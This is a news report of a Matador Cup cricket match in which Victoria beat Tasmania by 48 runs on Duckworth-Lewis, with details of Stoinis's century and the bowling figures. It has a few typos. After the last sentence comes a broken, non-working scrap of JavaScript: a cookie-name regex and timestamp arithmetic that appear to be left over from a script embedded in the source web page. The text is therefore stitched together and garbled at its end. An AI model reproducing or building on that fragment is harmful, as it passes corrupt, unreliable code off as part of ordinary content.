Victoria is through to the Matador Cup semi final, after a 48 run win over Tasmania on the Duckworth-Lewis method.

An impressive century from Marcus Stoinis set up the win, helping Victoria to an imposing total of 6-320 in its must win match against Tasmania at North Sydney Oval.

Stoinis, a late inclusion for the suspended Glenn Maxwell, took an incredible 20 balls to score his first run, before taking just 86 balls to score his next hundred runs. He was eventually dismissed for 109 from 112 balls, in an innings that included five fours and six sixes, as Victoria look to cement a spot in the Matador Cup finals.

Opener Aaron Finch made 52 from just 43 balls before being run out, while Peter Handscomb (67 from 67) and Dan Christian (38 not out from 14) were also instrumental in the Bushrangers' innings.

James Faulkner took three wickets, while Jackson Bird took two wickets.

In reply, Tasmania reached 7-230 after 43.1 overs, before heavy rain stopped play at North Sydney Oval.

Play was unable to resume and Victoria was declared the winner on the Duck-Worth Lewis method.

Tasmania started the run chase well, with Ben Dunk (54) and Tim Paine (47)  putting on 99 runs for the opening partnership, before Paine was dismissed for 47. That led to a mini collapse that saw the Tigers lose 4-32.

Youngster Jake Doran impressed with an unbeaten 34 from 38 balls, but it wasn't enough, with the Bushrangers running out 48 run winners.

James Pattinson was been the pick of the bowlers, with figures of 3-35 from 8.1 overs, while John Holland took two wickets.

The wins means Victoria will finish in second place on the table behind NSW, while Tasmania could still make the elimination final if the bottom placed Cricket Australia XI can beat South Australia on Wednesday. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}